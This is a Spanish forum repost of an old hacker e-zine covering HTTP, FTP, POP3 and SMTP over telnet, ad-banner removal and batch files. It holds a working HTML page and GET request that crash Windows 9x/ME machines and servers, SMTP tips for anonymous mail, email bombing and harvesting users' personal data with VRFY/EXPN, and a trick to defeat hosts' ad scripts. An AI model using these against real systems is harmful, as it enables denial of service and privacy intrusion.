Dark Soul Master

Somos Vagos, ¿¡Y Qué!?
 
ÍndicePortalCalendarioBuscarRegistrarseConectarse

Comparte | 
 

 Parte 2 Col_Hacker Volumen 1 (no tengo mas :( )

Ver el tema anterior Ver el tema siguiente Ir abajo 
AutorMensaje
Henry
Moderador
Moderador


Género : Masculino
Signo del Zodiaco : Libra
Signo en el Zodiaco Chino : Cabra
Cantidad de envíos : 451
Edad : 25
Localización : ¡Una cuarta más abajo del ombligo!
¿Cuáles Son Tus Hobbies? : Dormir q mas va a hacer?
¿Que Tal Andas De Humor? : Te importa?!
¿Cuáles Son Tus Videojuegos Favoritos? : Metin2, crazy taxi, estrategicos, pokemon de gba, resident evil [todos], soul river.(Aunque ya no juego nada de esto)
¿Qué Consola(as) Hacen Parte De Ti? : Sega dreamcast, PC

08042009
MensajeParte 2 Col_Hacker Volumen 1 (no tengo mas :( )

Código:
<!-- HEAD.HTML -->
                  <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
>
 <HTML>
      <HEAD>
              <TITLE>Netscape.com</TITLE>
                                            <STYLE TYPE="text/css">
                                                                    <!--
                                                                            A {
text-decoration:none;}
                          A:hover {text-decoration:underline;}
 
                                                                  .bluepollold {
 background-color: #99CCFE }
                                .bluepoll { background-color: #99CCFE; font-size
: 11px; }
 
            .fsize2 {font-family: Arial, Helvetica, sans-serif; font-size: 11px
;}
      .fsize3 {font-family: Arial, Helvetica, sans-serif; font-size: 13px;}
                                                                              .
s0Cb  {font-family: Arial, Helvetica, sans-serif; font-size: 10px; color: #00336
6;}
      .s0Cc  {font-family: Arial, Helvetica, sans-serif; font-size: 10px; color
: #99CCFF;}
              .s0Cd  {font-family: Arial, Helvetica, sans-serif; font-size: 10p
x; color: #CCCCCC;}
 
                      .s1cA  {font-family: Verdana, Arial, Helvetica, sans-seri
f; font-size: 10px; color: #000000;}
                                        .s1cAb  {font-family: Verdana, Arial, He
lvetica, sans-serif; font-size: 10px; color: #000000; font-weight:bold;}
                                                                            .s1c
B  {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color:
#003366;}
            .s1cBb  {font-family: Verdana, Arial, Helvetica, sans-serif; font-s
ize: 10px; color: #003366; font-weight:bold;}

***** etc etc


El metodo get devuelve el codigo HTML de la pagina que hayas pedido.
Lo mismo que seleccionar en el explorador Ver -> Codigo Fuente

Similarmente puedes ver que pasa cuando usas los metodos 'Post' y 'Head'
simplemente remplazando 'Get' con el metodo que desees usar.

Por ejemplo:

HEAD / HTTP/1.1
o
POST / HTTP/1.1

****************

Devolvamonos un poco a la respuesta que recibimos del daemon HTTP cuando el
metodo get fue aceptado por cibertol.com. La primera linea de la respuesta
fue:

HTTP/1.0 200 OK

_________________

ヘンリ

.........Un xD vale mas que mil palabras....... Mod Relax Room......
Y recuerden...Más grande que Chuck Norris, es Bruce Lee!!!!!!!!!!
http://mx.youtube.com/watch?v=8OfJj5dzGwg

Volver arriba Ir abajo
Ver perfil de usuario

 Temas similares

-
» Ya tengo el GOW3!!! pero...
» Ya tengo coche nuevo, viejo
» Ya tengo el platino!!!!
» Reproductor sin control de volumen.
» Me gustaria formar parte del clan en MW3
Compartir este artículo en : Excite BookmarksDiggRedditDel.icio.usGoogleLiveSlashdotNetscapeTechnoratiStumbleUponNewsvineFurlYahooSmarking

Parte 2 Col_Hacker Volumen 1 (no tengo mas :( ) :: Comentarios

Código:
Ahora, que significa el 200?
Pues bien, el 200 es llamado el codigo de estatus. Cuando un comando es dado
al servidor, este lo procesa y devuelve un codigo de acuerdo al resultado.
Un codigo de estatus contiene 3 digitos en el formato de xxx, van desde 1xx
hasta 5xx.

1xx - Informativo - Request recibida, continuando el proceso (Raramente encontrados)
2xx - Terminacion completa del comando dado.
3xx - Errores dado al cambio de sitio de documentos
4xx - Errores por parte del server.
5xx - Errores por parte del cliente.

El codigo de estatus mas comun es el 200, cuando logras ver completamente el
documento que hayas pedido en tu browser.
El q si debes haber visto algunas veces es el Error 404---No encontrado
Este mensaje de error te informa que el URL al que estas intentando acceder
no ha sido encontrado, ha sido movido, borrado o el link desde el cual has
venido esta errado.


::::::::::::::
Nota: Los servidores HTTP no mantienen una conexion estable, cada vez que das
un comando se procesara, te enviaran la informacion y x ultimo te desconectaran
Loguea la sesion de telnet.
::::::::::::::

Especificación completa sobre el Protocolo HTTP:

http://www.w3.org/Protocols/rfc2616/rfc2616.html


Lista de protocolos estandar de internet:

http://rfc.postgrado.uc.edu.ve/rfcxx00.html


<=======================================================================>
                                  3.2)- FTP
<=======================================================================>

Que es Ftp?
------------------------------------
Ftp (File Transfer Protocol - Protocolo de Transferencia de Archivos)

Te permite, descargar y subir archivos del servidor con gran facilidad y
velocidad si tienes el permiso suficiente para hacerlo. Tu exploras un sitio
FTP con tu browser de la misma manera en que exploras archivos y carpetas en
tu propia PC, obviamente depende de los privilegios de acceso que tengas en
el servidor.

Comandos FTP
------------
Para comunicarte con un daemon de FTP, solo tienes que conectarte con telnet
en el puerto 21 (predeterminado de FTP) y usar los siguientes comandos:

cd      cambiar directorio (en el servidor)
lcd    cambiar directorio local (cuando envias un archivo la carpeta del
        mismo sera la que especifiques con lcd)
dir,ls  lista del Directorio
binary  cambiar modo a transferencia binaria
get    Pedir un archivo
mget    pedir muchos archivos
put    enviar un archivo
mput    enviar muchos archivos
pwd    directorio actual en el servidor
syst    te devuelve la version y nombre del daemon que se esta corriendo
help    en algunos daemons, te da una lista de todos los comandos disponibles

El comando SYST revela informacion importante del sistema para la conexion
entre cliente y servidor. Solo ingresa al servidor usando nombre de usuario
y pasw cualquiera o como un usuario anonimo nombre de usuario:anonymous
pasw:cualquier  @direccion.com y tipea el comando SYST. Ten en cuenta que la
informacion SYST puede ser falsa.


Notas
+++++++++
1. Hay montones de clientes FTP que haran todo el trabajo por ti, pero no
esta de + saber un poco.

<=======================================================================>
                                  3.3)- POP3
<=======================================================================>

Que es POP3?
.............
POP es una abreviatura para  (Post Office Protocol). Este es el protocolo
usado para chequear cuentas de email no basadas en WEB.

Una cuenta de email basada en WEB solo puede ser usada a travez de cierta
pagina web. Mientras revisas tu correo te llenan de banners y propaganda
por proveerte gratuitamente de email. Las cuentas pop3 te proporcionan mas
espacio y casi siempre son dadas por el ISP que uses.

Una cuenta de email no basada en web es accedida a travez de un cliente de
email como el Eudora o Outlook o a travez de telnet, si conoces el
protocolo.

Las cuentas no basadas en web usan dos protocolos - SMTP (Simple Mail Transfer
Protocol) para enviar email y POP (Post Office Protocol) para recibir email.
POP3 es solo una nueva version de POP

Porque desearias aprender el protocolo POP3?
...........................................
Siempre puedes estar expuesto a recibir una bomba de email, si no te ha
pasado puedes imaginarte como es el recibir cientos de emails y tener que
borrarles 1 x 1, el conocer el protocolo te puede ayudar en ciertos casos
o simplemente te puede ayudar a hackear una cuenta.
Hay programas que te ahorran todo el trabajo pero como he dicho antes un poco
de conocimiento no esta de +, abriendo el email desde telnet, puedes por ej,
ver el encabezado completo de un email que te dara toda la informacion, desde
que servidor viene, desde que IP fue enviado. etc

POP3 no es nada del otro mundo.


Muy bien, Ahora vamos al .
..................
Lo primero q' necesitas es un cliente de telnet cualquiera. Unix tiene un
cliente telnet nativo (simplemente escribe telnet hostname/IP para hacer una
conexion al puerto 23 o telnet hostname/IP puerto y escoge un puerto)
Windows viene con una aplicacion telnet esta en c:\windows\telnet.exe pero
puedes acceder a ella, desde Inicio - Ejecutar y escribe telnet.

Ahora necesitas buscar tu servidor de email. Suele ser algo como
mail.tu-isp.com. POr ejemplo: si mi email es cad  @multiphone.net.co
Puede ser mail.multiphone.net.co o pop.multiphone.net.co ( Puedes encontrar
una lista de servidores de email colombianos en http://colhackers.8k.com/popsmtp.htm
Si ya tienes un cliente de email configurado como el outlook solo mira en las
opciones y encontraras el servidor pop3 y smtp de tu ISP
Bien, Ahora daremos un telnet al server en el puerto 110(el puerto
predeterminado para pop3)
Este es el mensaje q recibo cuando me conecto al servidor de mi ISP:

+OK POP3 [200.21.46.6] v4.3 server ready

Ahora necesitamos identificarnos. Debemos dar un nombre de usuario
y contraseña. Asi si mi email es cad  @multiphone.net.co, mi nombre de
usuario seria cad. Entonces escribo en el telnet:

user cad (o cualquiera q sea tu nombre de usuario)

Y el servidor responde con:

+OK User name accepted, password please

ahora el pasw ue? asi q' escribimos:

pass tu-password

Y el servidor responde con:

+OK Mailbox open, x messages (Cuando x es el numero de mensajes que tienes
en tu INbOx)

o con:

-ERR Bad login

Si tipeamos el pasw equivocado.
Para ver la lista de emails en el inbox escribe list, encontraremos un numero
q identifica cada nuevo email y un numero q identifica el tamaño de cada
mensaje. Ahora, lo siguiente seria leer nuestros mensajes. Para hacer esto
debemos escribir retr # (# sera remplazado por el numero del mensaje que
queremos abrir, ahora tendremos un email con su encabezado completo (Full
Header) y el cuerpo del mensaje (Body).

Para borrar un mensaje, escribimos dele # (donde # es el numero del mensaje
a borrar)

Cuando hayas terminado escribe quit para cerrar la sesion.

Notas Finales
...........
bueno, eso es todo! Breve no?
Solo hay una cosa mas, cuando estas dentro de la cuenta, un archivo de bloqueo
es creado, asi nadie mas puede entrar mientras tu estas logueado.
Bueno realmente Facil...

c_a_d  @hotmail.com
http://colhackers.8k.com
4/6/2002

<=======================================================================>
                                  3.4)- SMTP
<=======================================================================>

Que es SMTP?
............
SMTP (Simple Mail Transfer Protocol)
El SMTP provee mecanismos para la transmision de email directamente desde el
host del usuario que envia hasta al host del usuario que recibe, a travez de
este tipo de servidores es q puedes enviar un mail anonimo o una bomba de email
con un simple script que utilize comandos de SMTP, o a travez de uno de los
programas para email bombing que abundan en internet... (lameryzer.com)

Generalmente, por no decir que todos los servidores SMTP que hay en nuestro
pais son bastante inseguros, algunos servidores permiten que con solo saber
tu cuenta de email, yo pueda averiguar tu nombre, tu numero de telefono y
hasta la direccion de tu casa, vaya mierda!!! y aun piensas que hay anonimidad
en internet, sobretodo ahora que los ISPs loguean el # de tel desde el que
tiene acceso a internet determinada cuenta...

Por ej:
Si tu cuenta de email es fedor  @dostoyevski.com, asumo en 1er lugar que tu ISP
seria dostoyevski.com, abro telnet y me conecto a dostoyevski.com en el puerto
25 (el de SMTP), cuando el server este listo escribo:

VRFY fedor

y si tienes una porqueria de servidor como el que yo utilizaba te devuelve
algo como:

-0033456785098-Fedor Chibchombia-Terramoda S.A-<Fedor  @dostoyevski.com>

Adivinaras facilmente cada pieza de información que te devuelve el servidor,
 donde queda tu anonimidad?

ya volviendo al tema

En algunos server antes de realizar cualquier transaccion SMTP debes algo asi
como saludar al servidor para decirle quien eres, para esto se usa el comando
HELO o EHLO:

-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
HELO mixmail.com
250-Hello mixmail.com; <tudireccionip>
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
Código:
PROCEDIMIENTOS SMTP
..................

Hay 3 pasos para una transaccion de email SMTP, la transaccion empieza con el
comando MAIL que da la informacion de la persona que envia el email, sigue una
serie de comandos RCPT que son los recipientes del mensaje a enviar y finaliza
con DATA, que es el mensaje a enviar, la transaccion es procesada cuando termina
el comando DATA.

MAIL
Este comando le dice al servidor SMTP que una nueva transaccion esta empezando
y resetea cualquier estado actual, especifica quien envia el mensaje, puede
ser dejado en blanco. Su uso seria:

-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
MAIL FROM:
(Si el Sender es valido el servidor contestara con:)
250 Ok Sender is valid

MAIL FROM:<>
250 Ok Sender is Valid

(El segundo paso en el procedimiento es indicar el mail o los mails a donde va
dirigido el mensaje:)

RCPT TO:
250 Ok

RCPT TO:
250 Ok

(El tercer paso es especificar el mensaje a enviar, aqui es donde se ponen las
partes del email:)

DATA
354 Start mail input; end with . in a line itself
To:Mocosoft President
Cc:any  @someone.com
Bcc:anyone  @some.com
From:uejeje
Subject:A la mierda..

Uno que otro hoyo de seguridad...
.
250 ok Mail Accepted for delivery
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.


Comandos Adicionales
....................
SMTP provee comandos adicionales para verificar un nombre de usuario o expandir
una lista de emails.

VRFY (Verify)
Con este comando puedes saber si un usuario existe en el servidor, a veces
puedes conseguir mucha información solo con tener el email de una persona.
El servidor puede responder con:

-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
VRFY nombre

-otrosdatos - Nombre -
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

o simplemente con el nombre del email, .

EXPN (Expand)
Este comando sirve para expandir una lista de emails, si la lista tiene por
nombre CibeR y contiene 3 emails el servidor responde algo como:

-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
EXPN ciber
250-Master Champeta
250-igüazo Maria
250-
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

Es = que hacer un vrfy a cada usuario de la lista.
----------------------------------------------------------------------------
Nota:Algunas veces los ISP usan las "mailing list" para enviar mensajes a todos
sus usuarios de un solo tajo o para vender el envio de propaganda. En la ISP
de mi pueblito (ibagué papa) por ej: utilizan una mail box llamada ALLUSERS,
que provee la lista de todos los usuarios con sus respectivos nombres, dir y
Tel; al dar un comando "EXPN allusers".
Algunos Administradores sobretodo en Colombia son muy obvios al nombrar estas
mailing list, solo debes buscar algo como allusers, tolinetusers (en el caso
de mi ISP), clientes, usuarios, etc
----------------------------------------------------------------------------

A continuación expondre la lista completa de comandos SMTP:

HELP ---> Te devuelve los comandos disponibles en el servidor y te da infor
          macion sobre cada comando. Solo en algunos SMTP, la mayoria SENDMAIL

NOOP ---> No hace absolutamente nada, ni afecta la transaccion en proceso.

QUIT ---> Finaliza la sesion

RSET ---> Resetea el estado actual. Cancela cualquier transaccion en proceso.
          (Notese que despues del Mensaje: "250-Mail Accepted for delivery"
          el mail ya es enviado)

HELO ---> Identifica el servidor SMTP que envia al SMTP server q recibe, por
          lo tanto si pones MAIL FROM: deberias saludar al
          servidor con HELO hotmail.com

MAIL ---> Especifica quien envia el mensaje.

SEND ---> Se utiliza en remplazo de MAIL, si se desea mandar un mensaje a un
          terminal activo, si el terminal no esta activo o no acepta este tipo
          de mensajes. Se produce un error. Ej: SEND FROM:

SOML ---> Al = que SEND, pero si el terminal no esta activo , el mensaje es
          enviado a la cuenta mail del usuario. Ej: SOML FROM:

SAML ---> Al = que SEND pero el mensaje es enviado al terminal y tambien a
          la cuenta email del destinatario.

RCPT ---> Los recipientes. A donde va dirigido el mail. Si hay varios rcpts
          se debe usar una serie de este comando.

DATA ---> Es el mensaje en si, contiene las lineas de Asunto:, Para:, De:,
          CC: y BCC:.         

Este es un log de un mensaje enviado a travez de telnet:
telnet andinet.com puerto 25

-------------------------------------------------------------------------
220 SMTP/cmap ready_________________________________
helo cad
250 kepler.andinet.com
mail from:<>
250 MAIL FROM:<> OK
rcpt to:
250 RCPT TO: OK
data
354 Start mail input; end with .
From:Anyone in the jungle
To:cAd|
Subject:jejejrD
Email anonimo........
.
250 <3CBF1C2100001414> Mail accepted           
noop
250 NOOP
quit
250 kepler.andinet.com QUIT

<=======================================================================>
                      3.5)- FTP, HTTP, POP, SMTP Hacking
<=======================================================================>

Hay muchos hoyos de seguridad para muchos de estos daemons y para muchos
sistemas operativos, el mejor camino que encuentro es explicar como puedes
encontrarlos en la web, algunos de estos exploits seran analizados a fondo
en proximas ediciones de este e-zine.

Busca en las siguientes direcciones:
www.securityfocus.com
CERT (Computer Emergency Response Team) - http://cert.org
X-Force Search (simplest) - http://www.iss.net/cgi-bin/xforce/xforce_index.pl
Packet Storm - packetstorm.genocide2600.com
BugTraq Archives - http://www.securityfocus.com/level2/bottom.html?go=search
Fyodor's Exploit World - http://www.insecure.org/sploits.html
http://www.genocide2600.com/~spikeman/ Spikeman's Denial Of Service Website
RootShell - http://www.rootshell.com
Slashdot - http://www.slashdot.org
Data - http://www.hideaway.net/data.html

´´´´´´´´´´
Los anteriores sitios son considerados ilegales al explicar tan claramente
hoyos de seguridad y como explotarlos. Estos documentos son llamados "advisories"
y te permiten encontrar hoyos en tu propia PC y arreglarlos. Mientras tu uses
esta informacion para bien, hackear a otros es tu propia eleccion, esta es la
diferencia entre lo legitimo y lo ilegal.
``````````
Despues de entrar a uno de los anteriores sitios de busqueda busca por las
palabras que necesites, el daemon que se esta corriendo en el servidor, la
version. etc. nada mas sencillo que eso.
Código:
<=======================================================================>
                      4)- Banners? Hosting Gratuito
<=======================================================================>

Ultimamente hay por montones sitios en Internet q ofrecen hosting gratuito,
pero te habras dado cuenta como llenan de banners y propaganda inutil tu
pagina web, esa vaina del "casino on net" y otras cuantas de las que estoy
hasta el culo, explicare brevemente como podemos librarnos de los banners en
nuestras paginas web...

1 -
Existen dos nuevas tags aceptadas por el IE5 en adelante que permiten a un
webmaster filtrar cierto codigo, estas son <NOscript> y <NOFRAMES>, y ahora
nos serviran contra estas compañias de mierda que nos llenan de publicidad
que realmente no alcanzamos a leer, xq es casi un ataque visual lo que vemos,
yo estoy razonablemente de acuerdo en que por el hecho de prestarnos un
servicio gratuito nuestras paginas lleven un banner, pero a el abuso que se
llega a someternos es casi insostenible. Viendo las nuevas etiquetas se me
ocurrio el como librarnos de estas propagandas:

GALEON, IESPANA, GRATISWEB, ETC
Estos sitios de hosting agregan a cada pagina alojada un script que ejecuta
el banner o los frames que se abren al acceder a tu pagina, para librarte de
los banners de un sitio de estos, solo pon la etiqueta <NOscript> al final
de el archivo HTM pero justo antes de la etiqueta </HTML> que marca el final
de la pagina. Asi mi pagina quedaria:

<HTML>
<HEAD>
<TITLE>
colhackers.8k.com
</TITLE>
</HEAD>
<BODY text=#ffffff bgColor=#000000>
<P align=center><STRONG><FONT size=-1>IbAgUe - COLOMBIA... cAd|</FONT></STRONG></P>
</BODY>
<NOscript>
</HTML>

Dejando la etiqueta abierta justo antes del final de la pagina todos los
script que el servidor introduzca no se ejecutaran.


FREESERVERS, 20m, 100megas ETC
Existen algunos sitios como freeservers que nos proporcionan un bonito nombre
a la web, x ej http://colhackers.8k.com Wink algo mejor q tener:
http://www.geocities.com/rapesgirls/9876/index.htm
y que tambien proporcionan servicios avanzados como FeedBacks, Tableros de
Mensajes, etc. Para evitar el codigo que genera el frame de sitios como este
mira el siguiente codigo:
------------------------
<HTML>
<NOFRAMES>
<HEAD>
</HEAD>
<BODY>
</NOFRAMES>
<HTML>
<HEAD>
<TITLE>
colhackers.8k.com
</TITLE>
</HEAD>
<BODY text=#a7b5c6 bgColor=#000000>
<P align=center><STRONG><FONT size=-1>IbAgUe - COLOMBIA... cAd|</FONT></STRONG></P>
</BODY>
<NOscript>
</HTML>
------------------------

El robot de estos sitios justo despues de la etiqueta <BODY> inserta el codigo
de los frames, pero detecta que dentro de la etiqueta <BODY> </BODY> no
exista un </NOscript> o un </NOFRAMES> por lo que debemos crear el <BODY>
falso que hara que el server inserte su codigo alli pero no detecte el
</NOFRAMES> que tenemos despues de la etiqueta falsa y no en la verdadera
<BODY></BODY>. Asi que el codigo necesario seria:

<HTML>
<NOFRAMES>
<HEAD>
</HEAD>
<BODY>
</NOFRAMES>

Asi de simple.... jejeje

Por:cAd|
irc Dalnet #colhackers
c_a_d  @hotmail.com

<=======================================================================>
                      5)- Crash win 9x/ME
<=======================================================================>

Primero q todo guarda el siguiente texto como un archivo HTM y abrelo... Cheesy

-------------------------------------------------------------------------
<HTML>
<HEAD>
<TITLE>
</TITLE>
<script language="Javascript">
function StatusMsg(msge) {
  status=msge;
  document.returnValue = true;
}
</script>
</HEAD>
<BODY onmouseover="StatusMsg('ColHacK');return document.returnValue" text=#ffffff bgColor=#000000>
<P align=center><STRONG><FONT size=-1>ColHackers-cAd|</FONT></STRONG></P>
<A HREF="x:\con\con">Enter Here..</A>
</BODY>
</HTML>
--------------------------------------------------------------------------


Este es un error de Io.sys, en Win9x y ME, al intentar acceder a un path como
x:\device\device el computador te devolvera una de las pantallitas azules de
la muerte  (lugubremente clasicas en windows)  y no  habra otra solución que
reiniciar la PC.
no + intenta hacer un carpeta en c: con el nombre de un device... !"··!  @#

Algunas formas de usar este exploit remota y localmente:


1- Ejecutando el path x:\device\device donde device puede ser:

  CLOCK$      - Reloj de Sistema
  CON          - Consola; combinacion del teclado y la pantalla para manejar
                entrada y salida de datos.
  AUX or COM1  - Primer puerto de comunicacion serial.
  COMn        - Segundo, Tercero, ... puerto de comunicacion
  LPT1 or PRN  - Primer puerto paralelo
  NUL          - "null device" lo conocemos todos bajo linux como /dev/null.
  CONFIG$      - Desconocido


2- De forma remota mediante un archivo HTML...

2.1
------------------------------------------------
<HTML>
        <BODY>
          <A HREF="x:\con\con">crashing windowzes</A>
          <!-- o nul\nul, clock$\clock$ -->
          <!-- o aux\aux, config$\config$ -->
        </BODY>
      </HTML>
------------------------------------------------
Al dar click en el Link surgira el problema...

2.2
------------------------------------------------
<HTML>
        <BODY>
          <IMG SRC="x:\con\con">
          <!-- or nul\nul, clock$\clock$ -->
          <!-- or aux\aux, config$\config$ -->
        </BODY>
      </HTML>
------------------------------------------------
Con abrir la pagina es suficiente... solo en Windows 98 y ME se bloqueara
completamente el sistema, en windows 95 solo recibiras un pantallazo azul
y despues de reiniciarse el explorer.exe volveras a la normalidad...

3- Un sistema 9x corriendo un daemon de FTP o HTTP puede tambien ser nokeado
remotamente por ejemplo, intentado acceder a:

www.Win98machine.com/nul/nul
corriendo un daemon de HTTP o:

GET /con/con
corriendo WarFTP Daemon.


cAd|

<=======================================================================>
                      6)- Programacion Batch - *.bat
<=======================================================================>

~Leyendo Colombian Coffee hackers me di cuenta q' habian muchos .bat, pero bueno
ningun articulo sobre como hacerlos y los comandos generales...
Aunque ya esten algo pasados de moda, aki tienes pa' un rato, x lo menos a mi me han
servido de mucho en varias ocasiones...

DOS es basicamente un archivo llamado command.com este es el archivo que maneja
todos los comandos que tu escribes como COPY, DEL, DIR etc. estos comandos son
internos (los que van dentro de command.com), tambien existen comandos externos
como DISKCOPY, FORMAT, UNDELETE. etc
Asi que cuando escribes un comando, command.com lo ejecuta (comando interno) o
llama el programa externo y devuelve el resultado.
Los archivos Bat son para el DOS lo que las macros son para Word.
Los bat son basicamente archivos de texto simple conteniendo comandos de DOS,
el mejor editor para un archivo .bat es notepad solo recuerda grabar el archivo
con extension .bat
Cuando abres el archivo, DOS lo ejecuta linea por linea.

*********************
Algo que tienes q tener en cuenta es que el bat no puede tener el nombre de
un comando de DOS. Por ejemplo si creas un archivo .bat llamado dir.bat e
intentas ejecutarlo, nada pasara.
Esto es xq command.com cuando va a atravez de un comando, primero chequea si
es un comando interno. y si no lo es command.com busca un .exe .com o .bat
con ese nombre. Todos los comandos externos tienen una extension .COM o .EXE, DOS no mirara si el programa BATCH existe.
*********************

Ahora vamos por el primer archivo BATCH, simplemente escribe esto a
un archivo de texto y guardalo con extension .bat

cd c:\windows\
telnet

Miremos el codigo, la primera linea le dice a command.com q vaya a
c:\windows y luego ejecuta el cliente de telnet. Normalmente no necesitamos
cambiar el directorio dado q c:\windows es el directorio predeterminado de
DOS, asi que solo la siguiente linea funcionaria bien.

telnet

Veamos los comandos de los archivos BAT

REM

El comando mas simple es REM (Remark). Sirve para insertar comentarios en el
codigo y hacerlo mas comprensivo, al = q un <!--    --> en HTML.
Este comando ignora cualquier cosa que este delante de el en la misma linea,
no es mostrado en la pantalla durante la ejecución y es muy util en grandes
cantidades de codigo.
Pongamole un comentario a nuestro primer archivo bat:

REM Este programa ejecuta mi programa favorito; Telnet

telnet

ECHO

El comando ECHO es usado para mostrar algo en la pantalla, puede ser usado
para decirle al usuario que esta haciendo actualmente el arhivo.

ECHO Este archivo borrara todos los archivos temporales de tu sistema.
ECHO Ahora vamos al directorio Temporal
cd c:\windows\temp
ECHO Borrando archivos innecesarios...
del *.tmp
ECHO Tu sistema ahora esta limpio.

Ahora veamos que pasa cuando tu ejecutas ese archivo bat:

C:\WINDOWS>nombre_del_archivo.bat
C:\WINDOWS>ECHO Este archivo borrara todos los archivos temporales de tu sistema.
Este archivo borrara todos los archivos temporales de tu sistema.
C:\WINDOWS>ECHO Ahora vamos al directorio Temporal
Ahora vamos al directorio Temporal
C:\WINDOWS>cd windows\temp
C:\WINDOWS\TEMP>ECHO Borrando archivos innecesarios...
Borrando archivos innecesarios...
C:\WINDOWS>del *.tmp
C:\WINDOWS>ECHO Tu sistema ahora esta limpio.
Tu sistema ahora esta limpio.

El problema es q DOS esta mostrando el comando y tambien su resultado, para
esto se pone al principio del archivo:

ECHO OFF

Al agregar esa linea a nuestro archivo el resultado seria el siguiente:

C:\WINDOWS\Escritorio>ECHO OFF
Este archivo borrara todos los archivos temporales de tu sistema.
Ahora vamos al directorio Temporal
Borrando archivos innecesarios...
Tu sistema ahora esta limpio.

Cheesy muy bien!, pero en cualquier caso el comando inicial ECHO OFF se esta mostrando.
Para que no se vea en pantalla un comando pero q igualmente se ejecute, anteponemos
el signo  @, asi q la primera linea de nuestro archivo quedaria  @ECHO OFF
Para dejar una linea en blanco lo logico seria escribir algo como ECHO, pero eso no
funciona, debes escribir ECHO seguido de un punto en el archivo "ECHO.", dejar
una linea en blanco en el archivo tampoco funciona.
Código:
PAUSE

Digamos q tu creas un archivo bat que muestra los archivos en el directorio,
antes de ejecutar cualquier otra cosa. Tu debes dar tiempo al usuario de reaccionar
antes de realizar cualquier accion, para eso se usa el comando PAUSE:

REM Este programa borrara todos los archivos .doc en el directorio actual
REM Pero da al usuario la posibilidad de reaccionar y detener el proceso
  @ECHO OFF
ECHO CUIDADO: Borrar todos los documentos de Word?
ECHO Presione CTRL+C para abortar o cualquier otra tecla para continuar.
PAUSE
DEL *.doc

Cuando lo ejecutas obtienes el siguiente resultado:

C:\WINDOWS>a.bat
CUIDADO: Borrar todos los documentos de Word?
Presione CTRL+C para abortar o cualquier otra tecla para continuar.
Presione cualquier tecla para continuar . . .

^C

Finalizar el trabajo por lotes (S/N)?s

Despues regresaras a la linea de comandos.

PARAMETROS: Dando información a los archivos BAT

Para hacer a los programas realmente inteligentes, necesitas dotarlos de parametros
Para entender lo q realmente es un parametro, mira el siguiente script:

  @ECHO OFF
ECHO El Primer Parametro es %1
ECHO El Segundo Parametro es %2
ECHO El tercer Parametro es %3

El script muestra informacion en la pantalla, pero a q se refiere los %x, son
los parametros, guarda el anterior bat y ejecutalo de la siguiente manera:

C:\windows>batfile abc def ghi

El archivo produce el siguiente resultado:

C:\windows>batfile abc def ghi
El Primer Parametro es abc
El Segundo Parametro es def
El tercer Parametro es ghi

La primera linea en la salida es producida por la linea de codigo:

ECHO El Primer Parametro es %1

Basicamente lo que pasa, es q cuando DOS encuentra el simbolo %1, examina el
comando original usado para ejecutar el programa batch y busca la primera palabra(argumento)
despues del nombre del archivo batch, y asigna a %1 el valor de la palabra
En el ejemplo anterior la primera palabra es abc, asi que a %1 se le asigna el
valor de esta palabra.

El simbolo %2 trabaja de la misma forma, la unica diferencia es que en vez de
el primer argumento, DOS asigna el valor del segundo argumento, es decir def y
asi susesivamente.
Estos simbolos %1, %2, %3 etc son llamados parametros remplazables.

Si al ejecutar un archivo, damos mas parametros de los q el archivo batch necesita,
el resto de argumentos seran ignorados por DOS.

Para entender el uso de los parametros, veamos un ejemplo, el siguiente script
requiere q el usuario especifique los archivos a borrar y donde se encuentran ellos
localizados:

  @ECHO OFF
CD\
CD %1
DEL %2

El archivo puede ser llamado desde la linea de comandos de la siguiente manera:

batfile windows\temp *.tmp

En un script simple nosotros no podemos usar mas que nueve parametros remplazables.
Un archivo simple no puede tener mas parametros q de %1 a %9, el parametro %0
contiene el nombre del bat.

************
Digamos que tu deseas parar la ejecucion del archivo y regresar a WINDOWS,
el comando EXIT es utilizado en esas situaciones. Simplemente termina el
archivo con el comando EXIT. Automaticamente cerrara la ventana de DOS y
regresara a Windows.
************

SHIFT: Parametros infinitos

Algunas veces puede que el programa necesite usar mas que nueve parametros
al mismo tiempo. Para ver como funciona el comando SHIFT mira el siguiente bat:

  @ECHO OFF
ECHO El primer parametro es %1
ECHO.
SHIFT
ECHO El Segundo Parametro es %1
ECHO.
SHIFT
ECHO El Segundo Parametro es %1

ahora ejecuta el archivo en DOS y mira los que pasa.

batfile abc def ghi

El Primer parametro es abc

El segundo parametro es def

El segundo parametro es ghi

Como funciona? Cada comando SHIFT dado, hace q los parametros bajen una posicion.
Esto significa que el primer SHIFT, convierte a %1 en def, convierte a 2% en ghi
y abc es completamente eliminado por DOS. Todos los parametros cambian y se mueven
una posicion abajo.

FOR LOOP

Su uso es:

FOR %%PARAMETER IN(set) DO comando

Miremos el siguiente ej:

  @ECHO OFF
CLS
FOR %%A  IN (abc, def, xyz) DO  ECHO  %%A

Basicamente FOR declara una variable (%%A) y le asigna diferentes valores
dados en el set (abc, def, xyz) y cada vez que a la variable se le asigna un
nuevo valor, se ejecuta un comando (ECHO %%A)

%%A es la variable a la cual se asignan los valores, puedes usar cualquier
caracter despues de los dos signos % exceptuando del 0 al 9.

El IN(abc, def, xyz) es la lista a travez de la cual el comando FOR busca.
A la variable %%A se le asignan los valores entre los parentesis, pueden ser
separados x comas, o espacios.

Para cada item en el set el comando FOR ejecuta un comando que va despues de
DO, en este ejemplo se ejecuta ECHO %%A.

Ejecutando el archivo anterior obtenemos:

abc
def
xyz

El comando FOR es muy poderoso si es usado con parametros remplazables, el
siguiente archiv x ej:

  @ECHO OFF
ECHO.
ECHO Borrando los sigts archivos:
ECHO %1 %2
ECHO.
ECHO Presione Ctrl+C para abortar el proceso.
PAUSE
FOR %%a IN (%1 %2 ) DO DEL %%a
ECHO Archivos Eliminados. Mision Completa

Al momento de la ejecucion, el proceso seria algo como:

C:\WINDOWS>batfile  *.tmp *.bak

Borrando los sigts archivos:
*.tmp *.bak

Presione Ctrl+C para abortar el proceso.
